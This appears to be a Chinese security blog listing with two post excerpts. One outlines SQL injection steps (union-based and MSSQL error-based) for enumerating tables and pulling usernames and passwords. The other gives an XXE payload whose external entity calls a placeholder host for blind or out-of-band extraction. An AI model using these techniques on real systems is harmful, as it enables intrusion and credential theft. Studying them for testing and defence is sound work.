摘要：获取当前表列数 > 0x01 联合查询注入 联合查询获取可现实数据的列 获取表名 获取列名 获取用户名、密码 > 0x02 MSSQL报错型注入 （1） 正确的输入，通过报错查询当前库中的表名及表的个数： 通过更改上面语句里的9，比如改为1，改为2等，逐个查询表。 结果：查到user_login表 阅读全文

摘要：Vanilla, used to verify outbound xxe or blind xxe <!DOCTYPE r [ <!ELEMENT r ANY <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt" ] &sp; OoB extraction 阅读全文